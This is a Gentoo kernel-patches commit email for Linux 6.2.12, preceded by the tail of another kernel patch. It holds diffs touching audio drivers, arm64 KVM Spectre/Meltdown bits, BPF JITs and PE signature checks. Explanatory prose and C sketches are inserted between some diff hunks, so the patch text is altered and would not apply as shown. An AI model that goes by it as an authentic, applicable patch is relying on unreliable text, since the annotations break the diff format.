+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 4967f2daa6d97..96a2755b8747e 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1543,7 +1543,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8qm_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = true,
+ 	.fifo_depth = 64,
+-	.pins = 1,
++	.pins = 4,
+ 	.reg_offset = 0,
+ 	.mclk0_is_mclk1 = false,
+ 	.flags = 0,
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 4f7adbe671f3e..e0f92ab468896 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -1687,10 +1687,12 @@ static int sof_ipc4_route_setup(struct snd_sof_dev *sdev, struct snd_sof_route *
+ 	int ret;
+ 
+ 	if (!src_fw_module || !sink_fw_module) {
+-		/* The NULL module will print as "(efault)" */
+-		dev_err(sdev->dev, "source %s or sink %s widget weren't set up properly\n",
+-			src_fw_module->man4_module_entry.name,
+-			sink_fw_module->man4_module_entry.name);
++		dev_err(sdev->dev,
++			"cannot bind %s -> %s, no firmware module for: %s%s\n",
++			src_widget->widget->name, sink_widget->widget->name,
++			src_fw_module ? "" : " source",
++			sink_fw_module ? "" : " sink");
++
+ 		return -ENODEV;
+ 	}
+ 
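
The SOF logging fix removes a use-after-NULL in the error path itself:
the old message dereferenced whichever module pointer had just failed
the check. Generically, the safe shape is:

    #include <errno.h>
    #include <stdio.h>

    static int bind_route(const void *src_mod, const void *sink_mod,
                          const char *src_name, const char *sink_name)
    {
        if (!src_mod || !sink_mod) {
            /* say which side is missing without touching it */
            fprintf(stderr, "cannot bind %s -> %s, missing:%s%s\n",
                    src_name, sink_name,
                    src_mod ? "" : " source",
                    sink_mod ? "" : " sink");
            return -ENODEV;
        }
        return 0;
    }
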
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 8722bbd7fd3d7..26ffcbb6e30f4 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -183,6 +183,7 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	const struct sof_ipc_tplg_ops *tplg_ops = sdev->ipc->ops->tplg;
+ 	pm_message_t pm_state;
+ 	u32 target_state = snd_sof_dsp_power_target(sdev);
++	u32 old_state = sdev->dsp_power_state.state;
+ 	int ret;
+ 
+ 	/* do nothing if dsp suspend callback is not set */
+@@ -192,7 +193,12 @@ static int sof_suspend(struct device *dev, bool runtime_suspend)
+ 	if (runtime_suspend && !sof_ops(sdev)->runtime_suspend)
+ 		return 0;
+ 
+-	if (tplg_ops && tplg_ops->tear_down_all_pipelines)
++	/* we need to tear down pipelines only if the DSP hardware is
++	 * active, which happens for PCI devices. if the device is
++	 * suspended, it is brought back to full power and then
++	 * suspended again
++	 */
++	if (tplg_ops && tplg_ops->tear_down_all_pipelines && (old_state == SOF_DSP_PM_D0))
+ 		tplg_ops->tear_down_all_pipelines(sdev, false);
+ 
+ 	if (sdev->fw_state != SOF_FW_BOOT_COMPLETE)
+diff --git a/tools/testing/selftests/sigaltstack/current_stack_pointer.h b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+new file mode 100644
+index 0000000000000..ea9bdf3a90b16
+--- /dev/null
++++ b/tools/testing/selftests/sigaltstack/current_stack_pointer.h
+@@ -0,0 +1,23 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#if __alpha__
++register unsigned long sp asm("$30");
++#elif __arm__ || __aarch64__ || __csky__ || __m68k__ || __mips__ || __riscv
++register unsigned long sp asm("sp");
++#elif __i386__
++register unsigned long sp asm("esp");
++#elif __loongarch64
++register unsigned long sp asm("$sp");
++#elif __ppc__
++register unsigned long sp asm("r1");
++#elif __s390x__
++register unsigned long sp asm("%15");
++#elif __sh__
++register unsigned long sp asm("r15");
++#elif __x86_64__
++register unsigned long sp asm("rsp");
++#elif __XTENSA__
++register unsigned long sp asm("a1");
++#else
++#error "implement current_stack_pointer equivalent"
++#endif
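
The new header centralizes a GCC extension: a file-scope register
variable pinned to each architecture's stack-pointer register, so the
selftest can read SP as an ordinary variable. A minimal x86-64-only
usage sketch (the header itself selects the register per
architecture):

    #include <stdio.h>

    register unsigned long sp asm("rsp");  /* GCC/Clang extension */

    int main(void)
    {
        printf("stack pointer is near %#lx\n", sp);
        return 0;
    }
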
+diff --git a/tools/testing/selftests/sigaltstack/sas.c b/tools/testing/selftests/sigaltstack/sas.c
+index c53b070755b65..98d37cb744fb2 100644
+--- a/tools/testing/selftests/sigaltstack/sas.c
++++ b/tools/testing/selftests/sigaltstack/sas.c
+@@ -20,6 +20,7 @@
+ #include <sys/auxv.h>
+ 
+ #include "../kselftest.h"
++#include "current_stack_pointer.h"
+ 
+ #ifndef SS_AUTODISARM
+ #define SS_AUTODISARM  (1U << 31)
+@@ -46,12 +47,6 @@ void my_usr1(int sig, siginfo_t *si, void *u)
+ 	stack_t stk;
+ 	struct stk_data *p;
+ 
+-#if __s390x__
+-	register unsigned long sp asm("%15");
+-#else
+-	register unsigned long sp asm("sp");
+-#endif
+-
+ 	if (sp < (unsigned long)sstack ||
+ 			sp >= (unsigned long)sstack + stack_size) {
+ 		ksft_exit_fail_msg("SP is not on sigaltstack\n");
+diff --git a/tools/vm/page_owner_sort.c b/tools/vm/page_owner_sort.c
+index ce860ab941629..58ebfe3924024 100644
+--- a/tools/vm/page_owner_sort.c
++++ b/tools/vm/page_owner_sort.c
+@@ -847,7 +847,7 @@ int main(int argc, char **argv)
+ 			if (cull & CULL_PID || filter & FILTER_PID)
+ 				fprintf(fout, ", PID %d", list[i].pid);
+ 			if (cull & CULL_TGID || filter & FILTER_TGID)
+-				fprintf(fout, ", TGID %d", list[i].pid);
++				fprintf(fout, ", TGID %d", list[i].tgid);
+ 			if (cull & CULL_COMM || filter & FILTER_COMM)
+ 				fprintf(fout, ", task_comm_name: %s", list[i].comm);
+ 			if (cull & CULL_ALLOCATOR) {


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-20 11:15 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-20 11:15 UTC (permalink / raw
  To: gentoo-commits

commit:     f81bcf340ea7e0ecf04ff727f3a739fb7b1b49c9
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 20 11:15:27 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 20 11:15:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f81bcf34

Linux patch 6.2.12

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1011_linux-6.2.12.patch | 5038 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5042 insertions(+)

diff --git a/0000_README b/0000_README
index eb41631d..3bd4fbeb 100644
--- a/0000_README
+++ b/0000_README
@@ -87,6 +87,10 @@ Patch:  1010_linux-6.2.11.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.11
 
+Patch:  1011_linux-6.2.12.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.12
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1011_linux-6.2.12.patch b/1011_linux-6.2.12.patch
new file mode 100644
index 00000000..9bbea713
--- /dev/null
+++ b/1011_linux-6.2.12.patch
@@ -0,0 +1,5038 @@
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 7fbd060d60470..afed49280b52e 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -337,6 +337,8 @@ tcp_app_win - INTEGER
+ 	Reserve max(window/2^tcp_app_win, mss) of window for application
+ 	buffer. Value 0 is special, it means that nothing is reserved.
+ 
++	Possible values are [0, 31], inclusive.
++
+ 	Default: 31
+ 
+ tcp_autocorking - BOOLEAN
+diff --git a/Documentation/sound/hd-audio/models.rst b/Documentation/sound/hd-audio/models.rst
+index 9b52f50a68542..1204304500147 100644
+--- a/Documentation/sound/hd-audio/models.rst
++++ b/Documentation/sound/hd-audio/models.rst
+@@ -704,7 +704,7 @@ ref
+ no-jd
+     BIOS setup but without jack-detection
+ intel
+-    Intel DG45* mobos
++    Intel D*45* mobos
+ dell-m6-amic
+     Dell desktops/laptops with analog mics
+ dell-m6-dmic
+diff --git a/Makefile b/Makefile
+index 416490daa76ad..068374cc26018 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 11
++SUBLEVEL = 12
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+index de2fb1c01b6e3..b82381229adf6 100644
+--- a/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
++++ b/arch/arm/boot/dts/qcom-apq8026-lg-lenok.dts
+@@ -27,6 +27,16 @@
+ 	};
+ 
+ 	reserved-memory {
++		sbl_region: sbl@2f00000 {
++			reg = <0x02f00000 0x100000>;
++			no-map;
++		};
++
++		external_image_region: external-image@3100000 {
++			reg = <0x03100000 0x200000>;
++			no-map;
++		};
++
+ 		adsp_region: adsp@3300000 {
+ 			reg = <0x03300000 0x1400000>;
+ 			no-map;
+diff --git a/arch/arm/lib/uaccess_with_memcpy.c b/arch/arm/lib/uaccess_with_memcpy.c
+index 14eecaaf295fa..e4c2677cc1e9e 100644
+--- a/arch/arm/lib/uaccess_with_memcpy.c
++++ b/arch/arm/lib/uaccess_with_memcpy.c
+@@ -116,7 +116,7 @@ __copy_to_user_memcpy(void __user *to, const void *from, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memcpy((void *)to, from, tocopy);
++		__memcpy((void *)to, from, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		to += tocopy;
+ 		from += tocopy;
+@@ -178,7 +178,7 @@ __clear_user_memset(void __user *addr, unsigned long n)
+ 			tocopy = n;
+ 
+ 		ua_flags = uaccess_save_and_enable();
+-		memset((void *)addr, 0, tocopy);
++		__memset((void *)addr, 0, tocopy);
+ 		uaccess_restore(ua_flags);
+ 		addr += tocopy;
+ 		n -= tocopy;
+diff --git a/arch/arm64/boot/dts/qcom/sa8540p-ride.dts b/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
+index 6c547f1b13dc4..0f560a4661eba 100644
+--- a/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
++++ b/arch/arm64/boot/dts/qcom/sa8540p-ride.dts
+@@ -177,7 +177,7 @@
+ };
+ 
+ &remoteproc_nsp0 {
+-	firmware-name = "qcom/sa8540p/cdsp.mbn";
++	firmware-name = "qcom/sa8540p/cdsp0.mbn";
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 9c5573bc46145..e57f8ae093875 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -1877,9 +1877,33 @@ static int do_pkvm_init(u32 hyp_va_bits)
+ 	return ret;
+ }
+ 
++static u64 get_hyp_id_aa64pfr0_el1(void)
++{
++	/*
++	 * Track whether the system isn't affected by spectre/meltdown in the
++	 * hypervisor's view of id_aa64pfr0_el1, used for protected VMs.
++	 * Although this is per-CPU, we make it global for simplicity, e.g., not
++	 * to have to worry about vcpu migration.
++	 *
++	 * Unlike for non-protected VMs, userspace cannot override this for
++	 * protected VMs.
++	 */
++	u64 val = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++
++	val &= ~(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) |
++		 ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3));
++
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
++			  arm64_get_spectre_v2_state() == SPECTRE_UNAFFECTED);
++	val |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
++			  arm64_get_meltdown_state() == SPECTRE_UNAFFECTED);
++
++	return val;
++}
++
+ static void kvm_hyp_init_symbols(void)
+ {
+-	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR0_EL1);
++	kvm_nvhe_sym(id_aa64pfr0_el1_sys_val) = get_hyp_id_aa64pfr0_el1();
+ 	kvm_nvhe_sym(id_aa64pfr1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64PFR1_EL1);
+ 	kvm_nvhe_sym(id_aa64isar0_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR0_EL1);
+ 	kvm_nvhe_sym(id_aa64isar1_el1_sys_val) = read_sanitised_ftr_reg(SYS_ID_AA64ISAR1_EL1);
+diff --git a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+index 07edfc7524c94..37440e1dda930 100644
+--- a/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
++++ b/arch/arm64/kvm/hyp/include/nvhe/fixed_config.h
+@@ -33,11 +33,14 @@
+  * Allow for protected VMs:
+  * - Floating-point and Advanced SIMD
+  * - Data Independent Timing
++ * - Spectre/Meltdown Mitigation
+  */
+ #define PVM_ID_AA64PFR0_ALLOW (\
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_FP) | \
+ 	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_AdvSIMD) | \
+-	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_DIT) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2) | \
++	ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3) \
+ 	)
+ 
+ /*
+diff --git a/arch/arm64/kvm/hyp/nvhe/sys_regs.c b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+index 0f9ac25afdf40..3d5121ee39777 100644
+--- a/arch/arm64/kvm/hyp/nvhe/sys_regs.c
++++ b/arch/arm64/kvm/hyp/nvhe/sys_regs.c
+@@ -84,19 +84,12 @@ static u64 get_restricted_features_unsigned(u64 sys_reg_val,
+ 
+ static u64 get_pvm_id_aa64pfr0(const struct kvm_vcpu *vcpu)
+ {
+-	const struct kvm *kvm = (const struct kvm *)kern_hyp_va(vcpu->kvm);
+ 	u64 set_mask = 0;
+ 	u64 allow_mask = PVM_ID_AA64PFR0_ALLOW;
+ 
+ 	set_mask |= get_restricted_features_unsigned(id_aa64pfr0_el1_sys_val,
+ 		PVM_ID_AA64PFR0_RESTRICT_UNSIGNED);
+ 
+-	/* Spectre and Meltdown mitigation in KVM */
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV2),
+-			       (u64)kvm->arch.pfr0_csv2);
+-	set_mask |= FIELD_PREP(ARM64_FEATURE_MASK(ID_AA64PFR0_EL1_CSV3),
+-			       (u64)kvm->arch.pfr0_csv3);
+-
+ 	return (id_aa64pfr0_el1_sys_val & allow_mask) | set_mask;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index c243b10f3e150..5eca0cdd961df 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -558,6 +558,7 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 		for_each_set_bit(i, &mask, 32)
+ 			kvm_pmu_set_pmc_value(kvm_vcpu_idx_to_pmc(vcpu, i), 0, true);
+ 	}
++	kvm_vcpu_pmu_restore_guest(vcpu);
+ }
+ 
+ static bool kvm_pmu_counter_is_enabled(struct kvm_pmc *pmc)
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index c48c053d61466..de966c87e8dea 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -703,7 +703,6 @@ static bool access_pmcr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ 		if (!kvm_supports_32bit_el0())
+ 			val |= ARMV8_PMU_PMCR_LC;
+ 		kvm_pmu_handle_pmcr(vcpu, val);
+-		kvm_vcpu_pmu_restore_guest(vcpu);
+ 	} else {
+ 		/* PMCR.P & PMCR.C are RAZ */
+ 		val = __vcpu_sys_reg(vcpu, PMCR_EL0)
+diff --git a/arch/arm64/net/bpf_jit.h b/arch/arm64/net/bpf_jit.h
+index a6acb94ea3d63..c2edadb8ec6a3 100644
+--- a/arch/arm64/net/bpf_jit.h
++++ b/arch/arm64/net/bpf_jit.h
+@@ -281,4 +281,8 @@
+ /* DMB */
+ #define A64_DMB_ISH aarch64_insn_gen_dmb(AARCH64_INSN_MB_ISH)
+ 
++/* ADR */
++#define A64_ADR(Rd, offset) \
++	aarch64_insn_gen_adr(0, offset, Rd, AARCH64_INSN_ADR_TYPE_ADR)
++
+ #endif /* _BPF_JIT_H */
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 62f805f427b79..b26da8efa616e 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1900,7 +1900,8 @@ static int prepare_trampoline(struct jit_ctx *ctx, struct bpf_tramp_image *im,
+ 		restore_args(ctx, args_off, nargs);
+ 		/* call original func */
+ 		emit(A64_LDR64I(A64_R(10), A64_SP, retaddr_off), ctx);
+-		emit(A64_BLR(A64_R(10)), ctx);
++		emit(A64_ADR(A64_LR, AARCH64_INSN_SIZE * 2), ctx);
++		emit(A64_RET(A64_R(10)), ctx);
+ 		/* store return value */
+ 		emit(A64_STR64I(A64_R(0), A64_SP, retval_off), ctx);
+ 		/* reserve a nop for bpf_tramp_image_put */
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 288003a9f0cae..d586df48ecc64 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -1022,6 +1022,10 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		emit_atomic(insn, ctx);
+ 		break;
+ 
++	/* Speculation barrier */
++	case BPF_ST | BPF_NOSPEC:
++		break;
++
+ 	default:
+ 		pr_err("bpf_jit: unknown opcode %02x\n", code);
+ 		return -EINVAL;
+diff --git a/arch/powerpc/mm/numa.c b/arch/powerpc/mm/numa.c
+index b44ce71917d75..16cfe56be05bb 100644
+--- a/arch/powerpc/mm/numa.c
++++ b/arch/powerpc/mm/numa.c
+@@ -366,6 +366,7 @@ void update_numa_distance(struct device_node *node)
+ 	WARN(numa_distance_table[nid][nid] == -1,
+ 	     "NUMA distance details for node %d not provided\n", nid);
+ }
++EXPORT_SYMBOL_GPL(update_numa_distance);
+ 
+ /*
+  * ibm,numa-lookup-index-table= {N, domainid1, domainid2, ..... domainidN}
+diff --git a/arch/powerpc/platforms/pseries/papr_scm.c b/arch/powerpc/platforms/pseries/papr_scm.c
+index 2f8385523a132..1a53e048ceb76 100644
+--- a/arch/powerpc/platforms/pseries/papr_scm.c
++++ b/arch/powerpc/platforms/pseries/papr_scm.c
+@@ -1428,6 +1428,13 @@ static int papr_scm_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	/*
++	 * open firmware platform device create won't update the NUMA 
++	 * distance table. For PAPR SCM devices we use numa_map_to_online_node()
++	 * to find the nearest online NUMA node and that requires correct
++	 * distance table information.
++	 */
++	update_numa_distance(dn);
+ 
+ 	p = kzalloc(sizeof(*p), GFP_KERNEL);
+ 	if (!p)
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index bfb2afa4135f8..dee66c9290cce 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -19,6 +19,7 @@
+ #include <asm/signal32.h>
+ #include <asm/switch_to.h>
+ #include <asm/csr.h>
++#include <asm/cacheflush.h>
+ 
+ extern u32 __user_rt_sigreturn[2];
+ 
+@@ -181,6 +182,7 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ {
+ 	struct rt_sigframe __user *frame;
+ 	long err = 0;
++	unsigned long __maybe_unused addr;
+ 
+ 	frame = get_sigframe(ksig, regs, sizeof(*frame));
+ 	if (!access_ok(frame, sizeof(*frame)))
+@@ -209,7 +211,12 @@ static int setup_rt_frame(struct ksignal *ksig, sigset_t *set,
+ 	if (copy_to_user(&frame->sigreturn_code, __user_rt_sigreturn,
+ 			 sizeof(frame->sigreturn_code)))
+ 		return -EFAULT;
+-	regs->ra = (unsigned long)&frame->sigreturn_code;
++
++	addr = (unsigned long)&frame->sigreturn_code;
++	/* Make sure the two instructions are pushed to icache. */
++	flush_icache_range(addr, addr + sizeof(frame->sigreturn_code));
++
++	regs->ra = addr;
+ #endif /* CONFIG_MMU */
+ 
+ 	/*
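The riscv change above is the classic self-modifying-code rule: the sigreturn trampoline is written to the user stack through the data side (copy_to_user), so the two instructions may only be visible in the D-cache until the range is synchronized. A condensed sketch of the resulting order of operations, using the names from the hunk:

	/* 1. write the code through the data side */
	if (copy_to_user(&frame->sigreturn_code, __user_rt_sigreturn,
			 sizeof(frame->sigreturn_code)))
		return -EFAULT;

	/* 2. make it visible to instruction fetch */
	addr = (unsigned long)&frame->sigreturn_code;
	flush_icache_range(addr, addr + sizeof(frame->sigreturn_code));

	/* 3. only now point the return address at it */
	regs->ra = addr;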
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index ef80d361b4632..10622cf2b30f4 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -33,8 +33,8 @@ static int __init iommu_init_noop(void) { return 0; }
+ static void iommu_shutdown_noop(void) { }
+ bool __init bool_x86_init_noop(void) { return false; }
+ void x86_op_int_noop(int cpu) { }
+-static __init int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
+-static __init void get_rtc_noop(struct timespec64 *now) { }
++static int set_rtc_noop(const struct timespec64 *now) { return -EINVAL; }
++static void get_rtc_noop(struct timespec64 *now) { }
+ 
+ static __initconst const struct of_device_id of_cmos_match[] = {
+ 	{ .compatible = "motorola,mc146818" },
+diff --git a/arch/x86/pci/fixup.c b/arch/x86/pci/fixup.c
+index 615a76d700194..bf5161dcf89e7 100644
+--- a/arch/x86/pci/fixup.c
++++ b/arch/x86/pci/fixup.c
+@@ -7,6 +7,7 @@
+ #include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/vgaarb.h>
++#include <asm/amd_nb.h>
+ #include <asm/hpet.h>
+ #include <asm/pci_x86.h>
+ 
+@@ -824,3 +825,23 @@ static void rs690_fix_64bit_dma(struct pci_dev *pdev)
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x7910, rs690_fix_64bit_dma);
+ 
+ #endif
++
++#ifdef CONFIG_AMD_NB
++
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2                                  0x10136008
++#define AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK       0x00000080L
++
++static void quirk_clear_strap_no_soft_reset_dev2_f0(struct pci_dev *dev)
++{
++	u32 data;
++
++	if (!amd_smn_read(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, &data)) {
++		data &= ~AMD_15B8_RCC_DEV2_EPF0_STRAP2_NO_SOFT_RESET_DEV2_F0_MASK;
++		if (amd_smn_write(0, AMD_15B8_RCC_DEV2_EPF0_STRAP2, data))
++			pci_err(dev, "Failed to write data 0x%x\n", data);
++	} else {
++		pci_err(dev, "Failed to read data\n");
++	}
++}
++DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_AMD, 0x15b8, quirk_clear_strap_no_soft_reset_dev2_f0);
++#endif
+diff --git a/crypto/asymmetric_keys/pkcs7_verify.c b/crypto/asymmetric_keys/pkcs7_verify.c
+index f6321c785714c..3da32813e4412 100644
+--- a/crypto/asymmetric_keys/pkcs7_verify.c
++++ b/crypto/asymmetric_keys/pkcs7_verify.c
+@@ -79,16 +79,16 @@ static int pkcs7_digest(struct pkcs7_message *pkcs7,
+ 		}
+ 
+ 		if (sinfo->msgdigest_len != sig->digest_size) {
+-			pr_debug("Sig %u: Invalid digest size (%u)\n",
+-				 sinfo->index, sinfo->msgdigest_len);
++			pr_warn("Sig %u: Invalid digest size (%u)\n",
++				sinfo->index, sinfo->msgdigest_len);
+ 			ret = -EBADMSG;
+ 			goto error;
+ 		}
+ 
+ 		if (memcmp(sig->digest, sinfo->msgdigest,
+ 			   sinfo->msgdigest_len) != 0) {
+-			pr_debug("Sig %u: Message digest doesn't match\n",
+-				 sinfo->index);
++			pr_warn("Sig %u: Message digest doesn't match\n",
++				sinfo->index);
+ 			ret = -EKEYREJECTED;
+ 			goto error;
+ 		}
+@@ -478,7 +478,7 @@ int pkcs7_supply_detached_data(struct pkcs7_message *pkcs7,
+ 			       const void *data, size_t datalen)
+ {
+ 	if (pkcs7->data) {
+-		pr_debug("Data already supplied\n");
++		pr_warn("Data already supplied\n");
+ 		return -EINVAL;
+ 	}
+ 	pkcs7->data = data;
+diff --git a/crypto/asymmetric_keys/verify_pefile.c b/crypto/asymmetric_keys/verify_pefile.c
+index 7553ab18db898..22beaf2213a22 100644
+--- a/crypto/asymmetric_keys/verify_pefile.c
++++ b/crypto/asymmetric_keys/verify_pefile.c
+@@ -74,7 +74,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 		break;
+ 
+ 	default:
+-		pr_debug("Unknown PEOPT magic = %04hx\n", pe32->magic);
++		pr_warn("Unknown PEOPT magic = %04hx\n", pe32->magic);
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -95,7 +95,7 @@ static int pefile_parse_binary(const void *pebuf, unsigned int pelen,
+ 	ctx->certs_size = ddir->certs.size;
+ 
+ 	if (!ddir->certs.virtual_address || !ddir->certs.size) {
+-		pr_debug("Unsigned PE binary\n");
++		pr_warn("Unsigned PE binary\n");
+ 		return -ENODATA;
+ 	}
+ 
+@@ -127,7 +127,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	unsigned len;
+ 
+ 	if (ctx->sig_len < sizeof(wrapper)) {
+-		pr_debug("Signature wrapper too short\n");
++		pr_warn("Signature wrapper too short\n");
+ 		return -ELIBBAD;
+ 	}
+ 
+@@ -135,19 +135,23 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	pr_debug("sig wrapper = { %x, %x, %x }\n",
+ 		 wrapper.length, wrapper.revision, wrapper.cert_type);
+ 
+-	/* Both pesign and sbsign round up the length of certificate table
+-	 * (in optional header data directories) to 8 byte alignment.
++	/* sbsign rounds up the length of the certificate table (in the
++	 * optional header data directories) to 8-byte alignment.  However,
++	 * the PE specification states that while entries are 8-byte aligned,
++	 * this is not included in their length, and as a result, pesign has
++	 * not rounded up since 0.110.
+ 	 */
+-	if (round_up(wrapper.length, 8) != ctx->sig_len) {
+-		pr_debug("Signature wrapper len wrong\n");
++	if (wrapper.length > ctx->sig_len) {
++		pr_warn("Signature wrapper bigger than sig len (%x > %x)\n",
++			wrapper.length, ctx->sig_len);
+ 		return -ELIBBAD;
+ 	}
+ 	if (wrapper.revision != WIN_CERT_REVISION_2_0) {
+-		pr_debug("Signature is not revision 2.0\n");
++		pr_warn("Signature is not revision 2.0\n");
+ 		return -ENOTSUPP;
+ 	}
+ 	if (wrapper.cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA) {
+-		pr_debug("Signature certificate type is not PKCS\n");
++		pr_warn("Signature certificate type is not PKCS\n");
+ 		return -ENOTSUPP;
+ 	}
+ 
+@@ -160,7 +164,7 @@ static int pefile_strip_sig_wrapper(const void *pebuf,
+ 	ctx->sig_offset += sizeof(wrapper);
+ 	ctx->sig_len -= sizeof(wrapper);
+ 	if (ctx->sig_len < 4) {
+-		pr_debug("Signature data missing\n");
++		pr_warn("Signature data missing\n");
+ 		return -EKEYREJECTED;
+ 	}
+ 
+@@ -194,7 +198,7 @@ check_len:
+ 		return 0;
+ 	}
+ not_pkcs7:
+-	pr_debug("Signature data not PKCS#7\n");
++	pr_warn("Signature data not PKCS#7\n");
+ 	return -ELIBBAD;
+ }
+ 
+@@ -337,8 +341,8 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	digest_size = crypto_shash_digestsize(tfm);
+ 
+ 	if (digest_size != ctx->digest_len) {
+-		pr_debug("Digest size mismatch (%zx != %x)\n",
+-			 digest_size, ctx->digest_len);
++		pr_warn("Digest size mismatch (%zx != %x)\n",
++			digest_size, ctx->digest_len);
+ 		ret = -EBADMSG;
+ 		goto error_no_desc;
+ 	}
+@@ -369,7 +373,7 @@ static int pefile_digest_pe(const void *pebuf, unsigned int pelen,
+ 	 * PKCS#7 certificate.
+ 	 */
+ 	if (memcmp(digest, ctx->digest, ctx->digest_len) != 0) {
+-		pr_debug("Digest mismatch\n");
++		pr_warn("Digest mismatch\n");
